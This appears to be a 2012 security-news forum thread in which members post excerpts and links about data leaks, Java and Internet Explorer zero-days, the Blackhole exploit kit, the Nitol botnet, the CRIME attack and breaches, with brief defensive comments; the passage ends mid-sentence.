A group of hackers has released a vast quantity of data from banks, government agencies, consulting firms and many others and promised more data leaks in the future.
"Team GhostShell's final form of protest this summer against the banks, politicians and for all the fallen hackers this year," the group, which calls itself -- you guessed it -- "Team GhostShell," wrote in a Pastebin post titled "Project HellFire" this weekend. "With the help of it's [sic] sub-divisions, MidasBank & the newest branch, OphiusLab. One million accounts/records leaked. We are also letting everyone know that more releases, collaborations with Anonymous and other, plus two more projects are still scheduled for this fall and winter. It's only the beginning."
Read more at :
http://news.cnet.com/8301-1009_3-57501931-83/hackers-vow-hellfire-in-latest-major-data-leak/
***
-
***
Threats from Within: Former Moto Engineer Gets Jail for Espionage
Earlier this week, a judge sentenced Hanjuan Jin to four years in prison for stealing trade secrets from Motorola Solutions. The case has all the makings of a Law and Order episode—a naturalized American gets routinely screened by a customs agent at the airport as she's about to board her flight to China—but it also points out the importance of monitoring IT systems. While it's true that competitors are after our companies' innovations, security experts will verify that many, if not most, security breaches begin from the inside. The specifics of Jin's case, as reported from the FBI, provide some clues as to where suspicions could have been raised.
Read more at :
http://www.crn.com/blogs-op-ed/women-of-the-channel/240006578/threats-from-within-former-moto-engineer-gets-jail-for-espionage.htm?cid=nl_sec
***
-
***
Counting the cost of e-crime to retailers.
Actually it’s £205.4 million a year.
The British Retail Consortium (BRC) has released the findings of their first e-crime study. The study is based on responses to a quantitative survey conducted between April and May 2012. Respondents were members of the BRC drawn from a selection of key retailing types including supermarkets, department stores, fashion, health and beauty and mixed retail. The retailers questioned constitute around 45 per cent of the UK retail sector by turnover.
Read more at :
http://brianpennington.co.uk/2012/08/23/counting-the-cost-of-e-crime-to-retailer-actually-its-205-4-million-a-year/
***
-
***
New Secure Russian Tablet Keeps Data Out Of Google’s Hands
MOSCOW – It seems Russia’s defence ministry doesn’t trust Google’s tablet computers: a new Android device boasts encryption and works with software and a global positioning system made in Russia.
The National Nuclear Research University in Moscow has presented a top Russian government official with what resembled an Android operating system device but was actually a very similar domestic equivalent.
Thursday’s unveiling at a Berlin consumer electronics conference marked what Russia hopes will be the start of mass production of its first domestic tablet to rival devices developed by the US Internet search giant.
Read more at :
http://www.security-faqs.com/new-secure-russian-tablet-keeps-data-out-of-googles-hands.html
I see keeping data out of Google's hands as a good thing!
***
-
***
A who's who of Mideast-targeted malware
What do Stuxnet, Duqu, Gauss, Mahdi, Flame, Wiper, and Shamoon have in common?
For the second time in two weeks a virus outbreak has been reported at an energy company in that region. Qatari liquified natural gas producer RasGas said its corporate network and Web site were down after getting hit by a virus on Monday. Earlier this week the Saudi Aramco oil company confirmed that its network was hit by a virus two weeks ago, shutting down 30,000 workstations. Neither company identified the virus, but in at least one of the cases it is believed to be malware known as "Shamoon."
These are just the latest attacks targeting organizations in the region recently involving malware designed to steal secrets, wipe data, shut down corporate computers, and even sabotage nuclear power plants. Some of them are believed to be related, but others are not. Several were discovered in the course of researchers investigating others.
Read much more at :
http://news.cnet.com/8301-1009_3-57503949-83/a-whos-who-of-mideast-targeted-malware/
***
EDIT - I forgot to mention that many of these, such as Wiper, could be used against your own IP, Facebook, etc. which could wipe-out not only your on-line life but also too much personal material that will not be recoverable.
***
-
***
Report: Advanced Malware Targeting Organizations up Nearly 400 Percent
There’s been a huge jump in malicious, web-based infections targeting companies in the last year, a nearly 400 percent increase from last year, according to research released today by network security company FireEye. The company’s “Advanced Threat Report – 1H 2012,” blames the jump on attackers’ ability to penetrate organizations’ usual security infrastructures.
The report goes on to warn about the dangers of e-mail-based attacks, citing a 56 percent increase in the amount of email-based attacks that defeated "organizations' traditional security mechanisms," from January to June this year.
Read more at :
http://threatpost.com/en_us/blogs/report-advanced-malware-targeting-organizations-nearly-400-percent-083012
***
-
***
Hertfordshire plod passwords leaked by pro-Assange data burglar
A UK police website has been hacked, exposing usernames, unencrypted passwords and other sensitive login details for more than 90 serving officers.
The miscreant who raided the Hertfordshire force's database also lifted and leaked workplace phone numbers, email addresses, warrant numbers and PINs of the county's Safer Neighbourhood Team.
The hacker claims to be a sympathiser of Julian Assange, who is holed up in Ecuador's embassy in London to avoid extradition to Sweden, and the digital break-in is seen as a protest against efforts by UK police to arrest the Wikileaker-in-chief.
Read more at :
http://www.theregister.co.uk/2012/08/31/herts_police_website_hack/?utm_medium=twitter&utm_source=twitterfeed
***
-
***
Philips databases pillaged and leaked SECOND time in a month
Anonymous piles into electronics giant
Electronics giant Philips has been hacked for the second time in a month and its databases raided.
Usernames and encrypted passwords were leaked after the breach. It is not clear at this moment whether email addresses or the actual contents of corporate emails were included in the records dumped from the company's SQL databases. The lifted data was uploaded to various file hosting sites by hacktivists, who used blogs (since taken down by Google's Blogspot service) and social networks, using the hashtag labels "AntiSec" and "LulzSecReborn" to spread the word.
Read more at :
http://www.theregister.co.uk/2012/08/31/philips_anon_hack/
***
-
Java Runtime Environment 1.7.0.7
http://www.java.com/en/download/inc/windows_new_xpi.jsp
The new vulnerability allows a complete Java Virtual Machine sandbox escape in Java 7 Update 7, researchers from Security Explorations say
https://www.infoworld.com/d/security/researchers-find-critical-vulnerability-in-java-7-patch-hours-after-its-release-201472
:'(
-
Still 1.300 websites for banks and government institutions that still use insecure weak MD5-certification: http://news.netcraft.com/archives/2012/08/31/governments-and-banks-still-using-weak-md5-signed-ssl-certificates.html (link = Netcreaft rfesearch reults)
polonus
-
Hi Dim@rik,
Probably won't be long that new vulnerabilities will be found for that same Java hole, it only needs some further deeper diggin', a message as such comes reported here: http://www.forbes.com/sites/andygreenberg/2012/08/30/oracle-quietly-releases-fix-for-serious-java-security-bug-months-after-it-was-reported/
article author = Forbes staff's Andy Greenberg).
That is why users should not intstall java when they do not feel the need for it or use it only on a on-demand basis inside a browser.
For firefox I changed the config settings, see: http://kb.mozillazine.org/About:config_entries so an extra click will attent me to enable java that occasion or not.
Google Chrome already has such a configuration as by default and means to verify and auto-update plug-ins. Also it is a tad trickier for java to escape from the Google Chrome sandbox....but it is also vulnerable to certain java manipulation....
As auto-update never will alert for non-issued patches and loads of users are known to be slack on updates anyhow/anyway for whatever software, the so-called security illiterate and there are many of those users around, the problems are bound to linger on for quite some time and it is hey-season for malcreants and cybercriminals alike,
polonus
-
FinFisher Spy tool for Android Spotted in Canada (http://www.hotforsecurity.com/blog/the-government-wants-your-mobile-finfisher-spy-tool-for-android-spotted-in-canada-3293.html?goback=%2Egde_1003727_member_158272783)
-
Here we go again: Critical flaw found in just-patched Java ::)
Emergency fix rushed out half-baked
http://www.theregister.co.uk/2012/08/31/critical_flaw_found_in_patched_java/
Critical bug in newest Java gives attackers complete control of PCs
http://arstechnica.com/security/2012/08/critical-bug-discovered-in-newest-java/
-
Chemical biz 'Nitro' hackers use Java to coat PCs in poison ivy
Chinese spying crew is back in business
http://www.theregister.co.uk/2012/08/31/nitro_hackers_abuse_java_exploit/
-
I found something from Sophos. Some attacks on the Java security hole are hidden in a fake email from Microsoft. (http://nakedsecurity.sophos.com/2012/09/03/java-security-hole-microsoft/)
I had Java on my computer earlier this year. When the Secunia PSI (a program which is capable of automatically patching it) didn't patch the installation, I decided to uninstall Java. There is one website I still use that requires it for a packet loss test. I'm glad I no longer have it installed. I don't hate or dislike Oracle but I think if they want to improve their image they need to do a better job patching Java.
-
Nothing new in that for every security hole found there is likely to be a social engineering email purporting to have a patch, etc.
-
There is new malware that targets Linux and Mac OS X. (http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&cad=rja&ved=0CCkQqQIwAQ&url=http%3A%2F%2Fwww.techspot.com%2Fnews%2F50009-new-malware-targets-linux-and-mac-os-x.html&ei=eE5FUKfgCIOK7AHcq4CAAQ&usg=AFQjCNEOaft7LrUzWEMPXnZTfrVYla3jAA&sig2=Vs2Hb1S7iWaz418jW9uLSg) I found it using Google Search. It has stolen some passwords in some web browsers.
-
***
Swedish Government websites shut down by hacker attacks
Swedish government websites were jammed by hackers for hours Monday, with some supporters of WikiLeaks founder Julian Assange claiming responsibility on Twitter.
The websites of the Swedish government, Armed Forces and the Swedish Institute were among those experiencing problems.
Read more at :
http://my.earthlink.net/article/tec?guid=20120903/12eccc64-f936-47e9-8d6e-e90071c3c574
***
-
Google suspicious sign-in alert contains a trojan
http://www.h-online.com/security/news/item/Google-suspicious-sign-in-alert-contains-a-trojan-1698349.html
-
Google suspicious sign-in alert contains a trojan
http://www.h-online.com/security/news/item/Google-suspicious-sign-in-alert-contains-a-trojan-1698349.html (http://www.h-online.com/security/news/item/Google-suspicious-sign-in-alert-contains-a-trojan-1698349.html)
It's nice to see that avast! is one of 50% of the AV's at Virus Total (https://www.virustotal.com/file/df0b64f5d00af9da8adb4da3f72b559a517631cbd497c0ac03ccf81a256cc23a/analysis/) that catch this nasty trojan.
-
***
Cambodia set to expel Pirate Bay founder to Sweden
Cambodian police said Tuesday they will deport a Swedish founder of the popular file-sharing site The Pirate Bay as soon as the country's interior minister gives his approval. Deputy National Police chief Sok Phal said the decision to expel Gottfrid Svartholm Warg came after visiting Swedish officials presented legal documents on the copyright infringement case against him.
Cambodia has no extradition treaty with Sweden, so the expulsion can be done through an administrative process, such as revoking a visa, rather than legal proceedings.
Irate sympathizers meanwhile claimed to have hacked a number of Cambodian websites in retaliation for Svartholm Warg's arrest, which took place at the request of Swedish authorities last Thursday at a home he had rented in the Cambodian capital, Phnom Penh.
Read more at :
http://my.earthlink.net/article/tec?guid=20120904/a1e89ff9-f5df-4b31-a79b-f920173c3d36
***
-
***
Hackers Ready 'Fake' Windows 8 Antivirus Tool
Windows 8 isn’t out yet, but hackers are already taking advantage of the buzz surrounding the name.
According to security firm McAfee, the company has come across a fake antivirus/antimalware tool called “Win 8 Security system” that claims to detect malware but in fact does nothing more than throw up fake warnings that it offers to “fix” in exchange for a fee.
See & read more at :
http://www.forbes.com/sites/adriankingsleyhughes/2012/09/04/hackers-ready-fake-windows-8-antivirus-tool/
***
-
***
One million Apple IDs leaked online, hackers claim
A HACKING group claims to have released one million Apple device IDs that it says were stolen from an FBI computer.
The group AntiSec also claims to have access to more than 12 million other IDs, which it has not released, as well as account holders' personal information. The personal information is said to include user names, device names, telephone numbers and addresses.
According to experts this information could be handed to spammers and potentially used to infect computers and steal credit card details.
Read more at :
http://www.independent.ie/business/technology/one-million-apple-ids-leaked-online-hackers-claim-3219163.html
FBI Agent's Laptop 'Hacked' To Grab 12 Million Apple IDs - UPDATED
Three years ago special agent Christopher Stangl appeared in a video calling on people with computer science degrees to join the Federal Bureau of Investigation, saying they were needed “more than ever.” Last night, hackers with subversive online networks Anonymous and Antisec answered that call with nothing short of irreverence: they published what they claimed were more than 1 million unique device identifier numbers, (UDID) for Apple devices, stolen from Stangl’s own laptop.
In total, the hackers say they were able to steal more than 12 million of these strings of numbers and letters, but, “we decided a million would be enough to release.” They announced the hack through the widely-watched Twitter feed, @AnonymousIRC last night.
Read more at :
http://www.forbes.com/sites/parmyolson/2012/09/04/fbi-agents-laptop-hacked-to-grab-12-million-apple-ids-anonymous-claims/
***
-
***
New Mac malware stealing passwords
The malware targets computers running OS X and Linux. Known as Wirenet.1, it steals passwords you entered via web browsers such as Chrome, Chromium, Firefox and Opera, and it will also log keystrokes, according to the Russian antivirus experts, reports IT Wire.
Wirenet.1 installs itself as WIFIADAPT in the user’s home directory, according to the researchers.
Read more at :
http://www.macworld.co.uk/macsoftware/news/?newsid=3379049&olo=rss
***
-
Hackers Release 1 Million iOS Device UDIDs Obtained from FBI Laptop
http://www.macrumors.com/2012/09/04/hackers-release-1-million-ios-device-udids-obtained-from-fbi-laptop/
-
Some security experts say Java is still not safe. The source is InformationWeek (http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=newssearch&cd=1&cad=rja&ved=0CC4QqQIoADAA&url=http%3A%2F%2Fwww.informationweek.com%2Fsecurity%2Fattacks%2Fjava-still-not-safe-security-experts-say%2F240006876&ei=IRVJUOzMEMjm0gH2toHwAQ&usg=AFQjCNHxhLXyU9cyighTSUsJALaQqXNyHQ&sig2=5mbLFMOJZeITlNQkI4E-ig).
-
***
Ransomware Malware on the Rise
The number of new ransomware samples jumped roughly 50 percent between the first and second quarters of 2012.
Ransomware restricts access to infected computer systems so that attackers can extort payments in exchange for restoring access. According to McAfee, the number of new ransomware threats increased to more than 120,000 during the second quarter, a significant jump from the first quarter.
Read more at :
http://www.eweek.com/c/a/Security/McAfee-Ransomware-Malware-on-the-Rise-705358/?kc=EWKNLEDP09062012E
***
-
Microsoft Security Bulletin Advance Notification for September 2012
http://technet.microsoft.com/en-us/security/bulletin/ms12-sep
-
***
Despite Oracle's Patch, New Java 7 Vulnerabilities Emerge
Oracle last week issued a relatively rare unscheduled patch aimed at closing two vulnerabilities in Java 7 that opened the door to drive-by hacking. The security research group in Poland, which was instrumental in identifying the earlier vulnerabilities, now says it has found new weaknesses in Java 7 that enable a complete sandbox escape.
Read more at :
http://www.crn.com/news/security/240006688/despite-oracle-8217-s-patch-new-java-7-vulnerabilities-emerge.htm?cid=nl_sec
***
-
Version 15.0.1 of Firefox fixes a bug that exposed websites visited in private browsing mode. This is according to CSO Magazine (http://www.google.com/news/url?sr=1&sa=t&ct2=us%2F0_0_s_0_0_t&usg=AFQjCNGj1ILu55OXP6u1nGyckuyfFS9qWg&did=f7511ba743c14569&sig2=SNwiUxRvmpXXujy2GWM9Vw&cid=26389765800219&ei=o4lKUPjOLMSutwePZg&rt=STORY&vm=STANDARD&url=http%3A%2F%2Fwww.cso.com.au%2Farticle%2F435775%2Ffirefox_15_0_1_fixes_bug_exposed_websites_visited_private_browsing_mode%2F).
-
Google quietly snaps up internet security firm VirusTotal for an undisclosed amount
http://www.engadget.com/2012/09/07/google-acquires-virustotal/
http://www.forbes.com/sites/ericsavitz/2012/09/07/google-buys-virustotal/
http://cloud.trendmicro.com/google-and-virustotal-a-big-win-for-security-industry/
-
from Omid's TechBlog!
Outlook.com Gets 1 Million Users in First 6 Hours
http://techblog.omidfarhang.com/2012/08/outlookcom-gets-1-million-users-in.html
-
***
The real source of Apple device IDs leaked by Anonymous last week
A small Florida publishing company says the million-record database of Apple gadget identifiers released last week by the hacker group Anonymous was stolen from its servers two weeks ago. The admission, delivered by the company’s CEO exclusively to NBC News, contradicts Anonymous' claim that the hacker group stole the data from an FBI agent's laptop in March.
Anonymous’ accusations garnered attention because they suggested that the FBI was using the unique gadget identifiers -- called UDIDs -- to engage in high-level spying on American citizens via their iPhones, iPads, and iPod Touch devices. The FBI denied the claim, last week, and when asked to comment for this story, referred to last week’s denial.
Paul DeHart, CEO of the Blue Toad publishing company, told NBC News that technicians at his firm downloaded the data released by Anonymous and compared it to the company's own database. The analysis found a 98 percent correlation between the two datasets.
Read much more at :
http://redtape.nbcnews.com/_news/2012/09/10/13781440-exclusive-the-real-source-of-apple-device-ids-leaked-by-anonymous-last-week
***
-
***
Wyndham Hotels challenges FTC security suit over breaches
Wyndham Hotels and Resorts has filed a motion in U.S. District Court in Phoenix to dismiss a complaint launched by the Federal Trade Commission (FTC) over the chain's repeated security breaches.
According to the FTC, the offenses began when Russian hackers breached Wyndham's Phoenix data center in 2008 and stole the financial information of customers, leading to two subsequent breaches in a two-year period.
The FTC filed a lawsuit against Wyndham in June, claiming that more than $10 million in fraudulent purchases were made with hundreds of thousands of credit card numbers belonging to customers.
In response, Parsippany, N.J.-based Wyndham moved to dismiss the complaint on Aug. 27, saying in its filing that the FTC “singled out” Wyndham in “unprecedented litigation.”
Read more at :
http://www.scmagazine.com/wyndham-hotels-challenges-ftc-security-suit-over-breaches/article/258559/
***
-
***
Microsoft says "No!" to insecure certificate practices
Beginning in October, Windows computers consuming updates directly from Microsoft will no longer accept digital certificates that are signed with RSA keys smaller than 1024 bits.
This includes SSL certificates, Authenticode code signing certificates, email certificates, and any other certificates validated by the Windows Crypto APIs.
Why is this so important? It may break old applications, but it sets a new minimum standard that everyone should have adopted long ago.
The problem is many organizations got stuck in time and have not increased their key strength as flaws have been found and computing power has increased.
512-bit RSA keys were factored in 1999, while RSA 768 was factored in 2009. The reasonable conclusion is that these ciphers are no longer safe from snooping and need to be retired.
Read more at :
http://nakedsecurity.sophos.com/2012/09/11/microsoft-says-no-to-insecure-certificate-practices/?utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29&utm_medium=twitter&utm_source=twitterfeed
***
-
***
Cosmo, the Hacker ‘God’ Who Fell to Earth
Cosmo is huge — 6 foot 7 and 220 pounds the last time he was weighed, at a detention facility in Long Beach, California on June 26. And yet he’s getting bigger, because Cosmo — also known as Cosmo the God, the social-engineering mastermind who weaseled his way past security systems at Amazon, Apple, AT&T, PayPal, AOL, Netflix, Network Solutions, and Microsoft — is just 15 years old.
He turns 16 next March, and he may very well do so inside a prison cell.
Cosmo was arrested along with dozens of others in a recent multi-state FBI sting targeting credit card fraud. It is the day before his court date, but he doesn’t know which task force is investigating him or the name of his public defender. He doesn’t even know what he’s been charged with. It’s tough to narrow it down; he freely admits to participation in a wide array of crimes.
Read much more at :
http://www.wired.com/gadgetlab/2012/09/cosmo-the-god-who-fell-to-earth/all
***
-
Blackhole Exploit Kits update to v2.0
BlackHole exploit Kit 2.0
Are pleased to welcome you to a brand new version of the bundle of exploits. For more than 2 years of existence of our project, the old engine arrival and ligaments badly worn, AV companies have become very quick to recognize that this kind of criteria BlackHole and flag it as malware. In the new version we have rewritten from scratch, and re-written from scratch is not only part of the issuance of exploits, but also the admin pane
http://malware.dontneedcoffee.com/2012/09/blackhole2.0.html
-
***
From brand new laptop to infected by pressing 'on'
A customer in Shenzhen, China, took a brand new laptop out of its box and booted it up for the first time. But as the screen lit up, the computer began taking on a life of its own. The machine, triggered by a virus hidden in its hard drive, began searching across the Internet for another computer.
The laptop, supposedly in pristine, super-fast, direct-from-the-factory condition, had instantly become part of an illegal, global network capable of attacking websites, looting bank accounts and stealing personal data.
Read much more at :
http://my.earthlink.net/article/tec?guid=20120913/8490b60d-f4ad-472c-ad1a-cb96f0ab27a8
***
-
***
UK spy agency asks academics to tackle cyber risks
Britain's government says a new research institute partly funded by the country's eavesdropping spy agency will ask mathematicians and computer scientists to join the fight against cyber threats.
The Government Communications Headquarters, or GCHQ — Britain's equivalent of the U.S. National Security Agency — said Thursday that a new 3.8-million-pound ($6.1-million) program would fund a research institute at University College London.
Read more at :
http://my.earthlink.net/article/tec?guid=20120913/36297ea6-cbfa-4f24-b1c7-baf923d6ba50
***
-
***
Five Epic Hacks That Never Happened
These days when there’s trouble on the internet, there’s usually someone at the ready to jump up and take (or assign) blame for whatever went wrong, nevermind the facts. It can mean free publicity for your cause — whether it’s killing laws like SOPA or beefing up the federal budget for cyber security.
Sometimes it doesn’t take much more than a tweet and a Pastebin post to get a serious amount of free publicity. So in the spirit of yesterday’s GoDaddy incident where a random Twitter handle claimed to have downed the hosting giant, here are five great hacks that never happened — despite what you might have learned from the media.
Read more at :
http://www.wired.com/threatlevel/2012/09/hacks-that-never-happened
***
-
Cybercriminals have opened a new front in their battle to infect computers with malware - PC production lines.
Several new computers have been found carrying malware installed in the factory, suggests a Microsoft study.
One virus called Nitol found by Microsoft steals personal details to help criminals plunder online bank accounts.
Microsoft won permission from a US court to tackle the network of hijacked PCs made from Nitol-infected computers.
Domain game
In a report detailing its work to disrupt the Nitol botnet, Microsoft said the criminals behind the malicious program had exploited insecure supply chains to get viruses installed as PCs were being built.
The viruses were discovered when Microsoft digital crime investigators bought 20 PCs, 10 desktops and 10 laptops from different cities in China.
Four of the computers were infected with malicious programs even though they were fresh from the factory.....
"We found malware capable of remotely turning on an infected computer's microphone and video camera, potentially giving a cybercriminal eyes and ears into a victim's home or business," said Richard Boscovich, a lawyer in Microsoft's digital crimes unit in a blogpost.
more on link
http://www.bbc.com/news/technology-19585433 (http://www.bbc.com/news/technology-19585433)
-
***
Crack in Internet's foundation of trust allows HTTPS session hijacking
Attack dubbed CRIME breaks crypto used to prevent snooping of sensitive data.
Researchers have identified a security weakness that allows them to hijack web browser sessions even when they're protected by the HTTPS encryption that banks and e-commerce sites use to prevent snooping on sensitive transactions.
The technique exploits web sessions protected by the Secure Sockets Layer and Transport Layer Security protocols when they use one of two data-compression schemes designed to reduce network congestion or the time it takes for webpages to load. Short for Compression Ratio Info-leak Made Easy, CRIME works only when both the browser and server support TLS compression or SPDY, an open networking protocol used by both Google and Twitter. Microsoft's Internet Explorer, Google's Chrome and Mozilla's Firefox browsers are all believed to be immune to the attack, but at time of writing smartphone browsers and a myriad of other applications that rely on TLS are believed to remain vulnerable.
Read more at :
http://arstechnica.com/security/2012/09/crime-hijacks-https-sessions/
***
-
***
Minnesota woman fined $222,000 for 24 illegal song downloads
The first jury trial for a file-sharing suit brought by the major record labels has resulted in a $222,000 fine for a Minnesota woman accused of downloading and distributing more than 1,700 songs on the file-sharing site KaZaA. The court also forbid the woman, Jammie Thomas-Rasset, from making sound recordings available for distribution in the future.
Prosecuting 1,700 songs might have been bit unwieldy, so the Recording Industry Association of America (RIAA) instead focused on 24 illegally downloaded and shared music files.
A group of six recording companies first contacted Thomas-Rasset in 2005 after hiring MediaSentry, an online investigative firm, to look into suspected copyright infringement.
She turned down their initial demand of a $4,500 settlement.
Read more at :
http://nakedsecurity.sophos.com/2012/09/13/minnesota-woman-fined-222000-for-24-illegal-song-downloads/?utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29&utm_medium=twitter&utm_source=twitterfeed
***
-
***
New version of Blackhole exploit kit
Yesterday there were reports of an announcement that a new version (v2.x no less) of Blackhole exploit kit is on its way.
Blackhole is arguably the most successful exploit kit we have seen over the past couple of years, and we have described it in detail before (v1.x). The opening paragraph sets out what appears to be the main aim of the new version - improve how well they evade security measures:
"Are pleased to welcome you to a brand new version of the bundle of exploits. For more than 2 years of existence of our project, the old engine arrival and ligaments badly worn, AV companies have become very quick to recognize that this kind of criteria BlackHole and flag it as malware."
Read & see more at :
http://nakedsecurity.sophos.com/2012/09/13/new-version-of-blackhole-exploit-kit/?utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29&utm_medium=twitter&utm_source=twitterfeed
***
-
***
University of Miami Hospital Confirms Second Patient Info Breach This Year
The University of Miami Hospital (UMH) has begun to notify patients for the second time this year that some of their personal information may be at risk after the health care institution was hit with a data breach in July. According to a letter being sent to patients this month, two employees at the hospital were found “inappropriately accessing” patients' “face sheets," documents that give doctors a quick glance at patients' information. The employees have been terminated but may have since sold some of the sensitive information, according to information provided to the hospital by local law enforcement on July 18.
That information includes patients’ names, addresses, dates of birth, insurance policy numbers and the reason they visited the hospital. The hospital warns that the last four digits of patients’ Social Security numbers were also on these “fact sheets” and that some insurance plans still use patients’ SSNs as their insurance policy numbers, which are also on the sheets.
According to the letter, the breach affects any patients who may have been seen at the hospital on the Miller School of Medicine campus in Miami between October 2010 and July 2012. Patients who visited other divisions of the hospital offsite, including the Bascom Palmer Eye Institute, Sylvester Comprehensive Cancer Center, Sylvester at Deerfield Beach or Kendall, and UHealth at Plantation, aren’t at risk.
Read more at :
http://threatpost.com/en_us/blogs/university-miami-hospital-confirms-second-patient-info-breach-year-091212
***
-
***
End User Security Awareness Gap Remains Wide, Experts Say
Enterprise-driven security education programs continue to fall short of the mark
In a new survey on security training, Trustwave found that while 56 percent of security professionals claim they train new users during orientation, only 32 percent of employees say they have been educated on enterprise security.
This training gap has resulted in serious problems for some companies, according to the Trustwave study. Enterprises experience some 14.4 incidents of data loss per year due to employee negligence, and 15 percent of them have reported an insider breach executed with malicious intent.
Read more at :
http://www.darkreading.com/security/security-management/240007247/end-user-security-awareness-gap-remains-wide-experts-say.html
***
-
Microsoft finds malware on new computers in China
http://bigstory.ap.org/article/brand-new-laptop-infected-pressing#overlay-context=article/nyc-big-soda-crackdown-plan-goes-vote-thursday
urlvoid
http://www.urlvoid.com/scan/3322.org/
-
Hi Dima,
Blackhole 2.0 seems not to be Google Chrome browser friendly, so if users are asked to open up in firefox or IE, they should NOT do so to avoid infection.
See: http://ondailybasis.com/blog/wp-trackback.php?p=1330 artcle by Dennis Laskov link: on dasily basis blog
polonus
-
***
Microsoft Takes Aim At Nitol Botnet
A gap in security from within the PC supply chain has led Microsoft to take action against a botnet known as Nitol. The Redmond Washington-based software vendor has also been given court authority to assume control of the 3322.org domain and approximately 70,000 subdomains that are believed to be hosting the attacks.
It is believed that the malware was loaded, from some undetermined point in the supply chain, onto brand-new PCs produced in China, which were then distributed across the globe in an already-infected state. The same machines also appear to be running counterfeit versions of Windows.
Most of the infections have been found in China, but approximately 10 percent of the devices are believed to have been shipped to the United States. Most of the command-and-control servers are believed to be located in China.
Read more at :
http://www.crn.com/news/security/240007336/microsoft-takes-aim-at-nitol-botnet.htm?cid=nl_sec
***
-
***
Microsoft to Patch Adobe Flash Player in Windows 8 'Shortly'
Microsoft is working with Adobe Systems to patch vulnerabilities in Adobe Flash Player affecting Windows 8, apparently changing course and choosing to push out a fix before the operating system hits stores next month.
In Windows 8, Microsoft has opted to embed Flash Player in Internet Explorer 10 (IE 10). Last week, the company said publicly that it would wait until Windows 8 was generally available before patching Flash Player with the latest updates issued last month by Adobe.
However, in a statement Sept. 13, a Microsoft spokesperson told eWEEK that the company is working with Adobe to release an update for Flash in IE 10 that will be available shortly. Since Flash Player is embedded in IE 10, Microsoft will be responsible for patching it for Windows 8 users.
Read more at :
http://www.eweek.com/c/a/Security/Microsoft-to-Patch-Adobe-Flash-Player-in-Windows-8-Shortly-435077/?kc=EWKNLEDP09172012B
***
-
***
Zero-Day Season Is Really Not Over Yet
I can confirm, the zero-day season is really not over yet. Less than three weeks after the discovery of the Java SE 7 0day, aka CVE-2012-4681, potentially used by the Nitro gang in targeted attacks, a potential Microsoft Internet Explorer 7 and 8 zero-day is actually exploited in the wild.
First I would like to thanks the nice people (@binjo, @_sinn3r and all the guys of the Metasploit IRC channel on freenode) how helped me to understand and go further in my investigations.
Since the release of the Java SE 7 0day I was monitoring some of the infected servers used by the alleged Nitro gang. The 14th September morning, I discovered a “/public/help” folder on one of these servers, the Italian one (smile to @PhysicalDrive0).
See & read more at :
http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/
***
-
***
New Metasploit 0-day exploit for IE 7, 8 & 9 on Windows XP, Vista, and 7
We have some Metasploit freshness for you today: A new zero-day exploit for Internet Explorer 7, 8, and 9 on Windows XP, Vista and 7. Computers can get compromised simply by visiting a malicious website, which gives the attacker the same privileges as the current user. Since Microsoft has not released a patch for this vulnerability yet, Internet users are strongly advised to switch to other browsers, such as Chrome or Firefox, until a security update becomes available. The exploit had already been used by malicious attackers in the wild before it was published in Metasploit. The associated vulnerability puts about 41% of Internet users in North America and 32% world-wide at risk (source: StatCounter). We have added the zero-day exploit module to Metasploit to give the security community a way to test if their systems are vulnerable and to develop counter-measures.
See & read more at :
https://community.rapid7.com/community/metasploit/blog/2012/09/17/lets-start-the-week-with-a-new-internet-explorer-0-day-in-metasploit
***
-
***
Phonetic attack commands crash bank phone lines
Touch tone and voice activated systems open to attack.
A security researcher has demonstrated a series of attacks capable of disabling touch tone and voice activated phone systems or forcing them to disclose sensitive information.
In one test, a phone system run by an unnamed Indian bank had dumped customer PINs.
Attacks including blind SQL injection and buffer overflows could be served to almost any interactive voice response (IVR) phone system, according to Rahul Sasi, a security researcher with iSight Partners.
He said the attacks could take down critical phone systems, cutting off banking services or the ability of call centres to field customer inquiries.
“If someone can crash a banking app from anywhere in the world, that’s critical,” Sasi said.
“No banks or organisations are testing IVRs because they think the systems are secure, but in reality they are not. No firewall or CAPTCHAs monitor voice traffic.”
Read more at :
http://www.scmagazine.com.au/News/315844,phonetic-attack-commands-crash-bank-phone-lines.aspx
***
-
***
ID Theft Service Tied to Payday Loan Sites
A Web site that sells Social Security numbers, bank account information and other sensitive data on millions of Americans appears to be obtaining at least some of its records from a network of hacked or complicit payday loan sites.
Usearching.info boasts the “most updated database about USA,” and offers the ability to purchase personal information on countless Americans, including SSN, mother’s maiden name, date of birth, email address, and physical address, as well as and driver license data for approximately 75 million citizens in Florida, Idaho, Iowa, Minnesota, Mississippi, Ohio, Texas and Wisconsin.
Users can search for an individual’s information by name, city and state (for .3 credits per search), and from there it costs 2.7 credits per SSN or DOB record (between $1.61 to $2.24 per record, depending on the volume of credits purchased). This portion of the service is remarkably similar to an underground site I profiled last year which sold the same type of information, even offering a reseller plan.
What sets this service apart is the addition of more than 330,000 records (plus more being added each day) that appear to be connected to a satellite of Web sites that negotiate with a variety of lenders to offer payday loans.
Read much more at :
http://krebsonsecurity.com/2012/09/id-theft-service-tied-to-payday-loan-sites/
***
-
***
Malware attack blasted out in "Important Changes to Microsoft Services agreement" email
If you received an email, apparently from Microsoft, claiming to be about "Important Changes to Microsoft Services Agreement" would you trust it?
From the naked eye, after all, it looks professionally presented, has Microsoft's funky new logo.. what could be wrong with this?
The text of the email *is* apparently genuine, as there was an actual Microsoft message - dated August 27 - that can be viewed here.
The clue which should ring your alarm bells about this latest email, however, comes in the attached file: Microsoft-Services-Agreement.pdf.exe.
To those lacking in caution (or indeed, those Windows users who haven't told their operating system to show filenames in full) the attached file might appear to be an Adobe PDF document rather than an executable file.
But sure enough, it is an EXE file. And it will embed itself as a backdoor Trojan horse in your Registry to automatically run on startup.
Read more at :
http://nakedsecurity.sophos.com/2012/09/17/malware-attack-blasted-out-in-important-changes-to-microsoft-services-agreement-email/?utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29&utm_medium=feed&utm_source=feedburner
***
-
***
Banking malware Tinba infects 60,000 users in Turkey
The threat was named Tinba, or Tinybanker, because of its small size among banking malware, approximately 20 kilobytes ......
